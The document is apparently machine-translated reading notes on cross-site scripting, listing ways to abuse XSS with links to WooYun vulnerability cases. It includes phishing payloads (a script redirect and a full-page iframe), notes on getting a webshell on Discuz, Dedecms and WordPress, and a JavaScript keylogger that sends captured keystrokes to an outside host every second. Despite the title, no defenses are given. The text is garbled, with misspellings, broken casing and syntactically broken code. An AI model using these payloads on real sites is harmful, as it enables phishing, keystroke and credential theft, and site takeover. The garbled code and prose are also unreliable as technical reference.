XSS Cross-site scripting attacks and defense reading notes (original)

XSS can execute arbitrary JS code in client execution

How to use 0x01 XSS

1. Fishing Case: http://www.wooyun.org/bugs/wooyun-2014-076685 How I scan the intranet and creep to the front desk via an XSS detection Sohu intranet

2. Fishing, forged operation interface Fishing

Direct jump

<script>document.location.href= "Http://test.com/xxx.htm"

IFRAME Fishing

<iframe src= "http://test.com/11.htm" heigt= "100%" width= "100%" >

Flash Fishing

http://www.wooyun.org/bugs/wooyun-2010-02532

3. Projectile Advertising Brush Flow

4. Any post/get operation

such as in DZ in the background of the storage type XSS can get Uckey, or get Webshell case

http://www.wooyun.org/bugs/wooyun-2010-045716

In Dedecms, a store XSS with background file Manager Getshell

Case: Dedecms using XSS+CSRF Getshell

http://huakai.paxmac.org/?p=587

Wordpess The XSS Mate template is stored in the Getshell

The 5.HTML5 can also

6. Stealing cookies

The blind type of XSS

7.XSS Keylogger

{    get = window.event?event:e;  
  key = Get.keycode?get.keycode:get.charcode;    
Key = String.fromCharCode (key);   
Keys+=key;} Window.setinterval (function ()
{  
New Image (). src = ' http://yourhost.com/g.php?c= ' +keys;    Keys = ";}, 1000);

　　

8. Spying on client information

  Scan Intranet
  Auto-Submit St2 Vulnerability (case listed in Heige ppt)
  IP Address
  

10.ddos

  

XSS Cross-site scripting attacks and defense reading notes (original)